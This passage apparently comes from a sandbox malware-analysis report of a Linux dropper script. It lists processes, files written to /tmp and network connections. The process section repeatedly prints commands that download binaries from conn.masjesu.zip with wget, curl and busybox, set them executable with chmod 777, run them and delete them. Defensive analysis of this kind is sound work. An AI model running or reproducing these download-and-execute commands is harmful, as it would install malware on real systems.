| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s | /usr/bin/curl | N/A |
Processes
/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh
[/tmp/3f7a8adc0ac9b7c50701aef9ecee0ed8802d844994998c2f67757fe59a993aa9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/chmod
[chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
[./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/rm
[rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/chmod
[chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
[./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/rm
[rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/chmod
[chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
[./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/rm
[rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/chmod
[chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
[./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/rm
[rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/chmod
[chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
[./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/rm
[rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/chmod
[chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
[./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/rm
[rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/chmod
[chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
[./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/rm
[rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/chmod
[chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
[./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/rm
[rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/chmod
[chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
[./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/rm
[rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/chmod
[chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
[./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/rm
[rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/chmod
[chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
[./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/rm
[rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/chmod
[chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
[./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/rm
[rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/chmod
[chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
[./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/rm
[rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/chmod
[chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
[./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/rm
[rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/chmod
[chmod 777 UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
[./UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/bin/rm
[rm UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/chmod
[chmod 777 j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
[./j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/bin/rm
[rm j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/chmod
[chmod 777 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
[./1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/bin/rm
[rm 1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/chmod
[chmod 777 Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
[./Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/bin/rm
[rm Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/chmod
[chmod 777 eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
[./eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/bin/rm
[rm eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/chmod
[chmod 777 Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
[./Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/bin/rm
[rm Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/chmod
[chmod 777 QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
[./QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/bin/rm
[rm QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/chmod
[chmod 777 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
[./0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/bin/rm
[rm 0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/chmod
[chmod 777 hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
[./hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/bin/rm
[rm hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/chmod
[chmod 777 WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
[./WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/bin/rm
[rm WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/chmod
[chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
[./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/bin/rm
[rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/chmod
[chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
[./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/bin/rm
[rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/chmod
[chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
[./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/bin/rm
[rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/chmod
[chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
[./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
/bin/rm
[rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
